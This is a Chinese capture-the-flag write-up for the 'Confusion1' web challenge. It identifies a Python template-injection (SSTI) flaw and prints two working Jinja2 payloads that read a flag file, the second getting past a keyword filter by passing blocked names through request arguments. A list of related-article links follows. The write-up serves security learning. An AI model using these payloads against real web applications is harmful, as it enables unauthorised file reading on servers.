WEB:Confusion1

sleepywin2023-07-19 19:00

背景知识

SSTI漏洞

题目

根据网站图片和题目描述的提示,大象是php,蟒蛇是python,说明了这个网站是用python写的

在python中,比较常规的漏洞就是SSTI模板注入

没有思路,先点login和register页面看看

查看源代码

之前猜测是ssti漏洞,先验证

ssti常用注入

复制代码 
__class__() 返回对象的类
__base__()/__mro__() 返回类所继承的基类
__subclasses__() 返回继承类的所有子类

测试payload

复制代码 
{{"".__class__.__mro__[2].__subclasses__()[40]("/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt").read()}}

被过滤了

替换payload为

复制代码 
{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?&a=__class__&b=__mro__&c=__subclasses__&d=read

得到flag

参考学习链接:
【愚公系列】2023年05月 攻防世界-Web(Confusion1)_confusion1攻防世界_愚公搬代码的博客-CSDN博客 【攻防世界WEB】难度四星12分进阶题:Confusion1_wx617e2c956ef44的技术博客_51CTO博客

相关推荐
缘友一世12 小时前
计算系统安全速成之内存布局与缓冲区溢出攻击【4】
安全·系统安全·计算机系统
Bruce_Liuxiaowei12 小时前
从系统安全角度方面看注册表项Windows NT与Windows的区别
windows·安全·系统安全
-大头.13 小时前
Java泛型实战:类型安全与高效开发
java·开发语言·安全
编程乐学(Arfan开发工程师)13 小时前
渗透测试基础详解:通往 CISP-PTE 的第一步
网络·安全·web安全
白露与泡影13 小时前
Java关键字解析之final:不可变的本质、设计哲学与并发安全
java·开发语言·安全
pandarking14 小时前
[CTF]攻防世界:easy_laravel 学习
java·学习·web安全·laravel·ctf
white-persist14 小时前
网络空间安全核心领域技术架构深度解析
c语言·开发语言·网络·python·安全·网络安全·架构
Evan芙14 小时前
Nginx安全相关的参数总结
运维·nginx·安全
YJlio14 小时前
桌面工具学习笔记(11.3):ZoomIt——演示、录屏与线上会议的放大标注神器
笔记·学习·安全
qq_3718021114 小时前
【自动发文测试】Windows安全
windows·安全
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03【AutoGLM部署】本地私有化部署AI手机Agent04Linux下V2Ray安装配置指南05Cursor 又偷偷更新,这个功能太实用:Visual Editor for Cursor Browser06Open-AutoGLM Windows 安装部署教程07【超详细教程】手把手教你从微软官网免费下载Windows 10官方原版ISO镜像(2025最新版)08BongoCat - 跨平台键盘猫动画工具09Windows 11 官方系统安装与重装完整教程(2025年最新版)10安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)